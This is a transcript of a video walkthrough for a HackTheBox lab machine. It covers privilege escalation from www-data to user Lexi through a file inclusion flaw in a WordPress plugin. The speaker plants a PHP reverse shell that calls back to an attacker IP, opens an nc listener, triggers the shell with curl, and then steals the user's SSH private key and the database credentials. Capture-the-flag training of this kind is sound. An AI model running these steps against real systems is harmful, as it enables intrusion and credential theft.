back, guys. So now we are going to escalate our privilege from www data to Lexi user. So we got a process from Lexi, and once we enumerate more, we found that Lexi is running or published a web application on WordPress. So once we go inside, we don't have permission to read the wp-config.php file, but we found two plugins. So let's go and we see if there is any vulnerability regarding these plugins. So the first one is brand folder plugin. So let's say brand folder WordPress exploit, and there is one which is local and remote file inclusion. So let's see what's inside it. Till then we can go and check cd wp content /plugins /brand folder and ls space -la. So these are the files inside. Okay, so WordPress plugin brand folder 3.0 local / remote file inclusion. What this exploit all about is this vulnerability occurs at the first line of the file in callback.php, which we have here, callback.php. Let's see what's inside callback.php. Callback.php. This is the file. Okay, so let's see. And you can see here this file is very similar to our callback.php file, and what it's using initiate _ set display _ error equal to 1, error reporting -1. The function it's using is require once, and it's going to request a parameter. The parameter name is wp _ absolute path, and it is going to read this file. Fine. Then it has a directory named as wp admin. Inside there is another directory includes, and there are 4 files: media.php, file.php, image.php, and post.php. So this request is based on the user input. So as you can guess, an attacker can, depending on the context, host on a malicious server. So a file called wp-load.php are disabled its execution using an htaccess or abuse the null byte character, and these are the URLs. With that you can exploit that LFI, or you can read that file. But the thing is, you need to pass the absolute path, and it will automatically read this wp load.php. So you do not need to specify the file name. You just need to give the absolute path till the directory where this file is present, right? So let's go, and we will first of all we need to create these files and folders. Copy that part, and I'm going to paste it here. Now first thing first, we need to find out, go to its home directory. Okay, let's see, find anything where we can actually have the right permission, writable, hit enter, and there are some directories where we have write permission, like uploads. We don't need any file, we actually need directories from where we can create our directory and files. So this is the path, cd html /logs/uploads. Fine. And here create a directory, let's say wp, and inside that directory we will create first wp and -load.php, and inside this directory we will create okay, and wp-admin, and inside that directory we will create another directory includes, and inside that directory we will create 4 files. Okay, so Let's go. First of all, mkdir and wp is the directory, cd wp, and here we will create wp-load.php. okay, and we will create, oh come on, touch wp-load.php. Then make a directory named as wp-admin and cd wp-admin. There we will create another directory, includes, and cd includes. We will create some files like file.php space media.php space image.php, and at last post.php. These 4 files we need to create. So ls and all these files are there. The thing is, inside these files, whatever you can put, whatever php file you can put. Let's say we are going to say php, let's say echo hello. Okay, so save it as inside desktop htb moderators, let's say test.php, this one. Okay, yeah, replace it. Okay, now come back here, clear cat test.php and make it base64 in code. Base64, yeah. Now take this content, copy that, take this content from here up to here, copy this, come back here, let's clear that, and what we need here is we will say echo space hyphen n, paste that, and let's say base 64 space hyphen d, and paste it to file.php, right? Okay, next one, copy that, and here I am going to say paste it in media.php, then we will paste it to post.php, and last but not least we will paste it in one more file is there, which one? image.php. So all these files have the same content, no problem in it. Let's go back and we will put something inside wp hyphen load. So cat wp hyphen load.php, and there is nothing now. So we need to put here reverse shell. So I'm going to say, let's say payload all the things php reverse shell. Okay, where is php? This is the php, and let's take this one up to here, copy that and paste it here. Now we need to just change the IP addresses. So 10.10.14.9, this is my IP. Let's make it on port 4242, no problem in it, and everything seems okay. Now what we need here, we just need to put here PHP, and in the last we need to put like this. So that's it. Copy that and paste it here in the test.php, save it, come here and convert it into the base64 string. So cat test.php base64. Okay, that seems not perfect because it should be in single line. So we need to first paste this here, and okay, fine. So now copy that and come back here, and here we will say echo space -n, paste that, and at last we will say base 64 space -d and paste it into wp-load.php. okay, so now if we say cat wp-load.php, so you can see our data is already there, so we can see at the same time. Now clear this and come back here, nc space -nlvp 4242, right? And here we will just say curl http://127.0.0.1 and the port number is going to be 8080. wp-content, inside wp-content there are plugins, inside plugins there is brand folder, right? Inside brand folder there is callback.php. Make sure I'm typing right spelling, yeah, and there we have wp underscore absolute path abs path, okay, because if we see this file, it's using this parameter and its value is wp load, but we need to just give the absolute path up to the directory. It will automatically read this file, so its value is going to be, let's say, var/www/html/wp, right? No, not wp, it's inside logs/uploads, and inside upload we created wp, and inside wp-load is already there, so just hit enter. It is going to execute it and we will get the reverse shell. And actually we did something wrong. What? My IP is 9, not 19, so this is the problem. Let's repeat the process one more time. Clear that and come back here. The test file is saved now. This is the correct one. Cat test.php base 64. okay, take this, copy and come back here. Now paste this, paste that, okay, and now take this, copy, come back here, echo space -n, paste the string, and let's say base 64 space -d and paste it to wp-load.php. okay, enter. That seems perfect. Clear that and again let's go for that. So let's go and we will do the same thing. Curl 127.0.0.1 port number 8080 /wp-content/plugin/brand folder /callback.php, and inside that there is wp_abs path and its value is going to be /var www.html logs/uploads/wp and hit enter and we get the reverse shell. So who am I? We are Lexi user. Okay, so now cd, go to his home directory, ls space -la. There is user.txt, so we can see user.txt. This is the first flag, and then there is .ssh directory too. So let's try to read the ID RSA file, private key for the Lexi user. Okay, so just copy that. Copy, come back here, come here, paste that and save it as ID underscore RSA. Now back here, chmod plus, not plus, 600 ID RSA. Clear that and let's see, SSH space -i ID RSA Lexi at 10.10.11.173. Hit enter and hopefully we will log in this time. Yeah, we are logged in. So let's say ID. So we are Lexi user, but the thing is we are also the member of Moderators group. So now we will go from Lexi user to John and we will see what we can do from that. But the thing here is, as we mentioned before, that we can now read the WP config file. Before we cannot. So let's go and we will first try to read WP config.php file, which is here, WP config.php. So clear that and cat wp-config.php. Okay, and as you can see here, we have all the details about the database. So I'm going to copy this one with me, come back here, paste it here, save it. Okay, not save now. Clear that. So now let's try to access the database from here and we will see what's inside the database.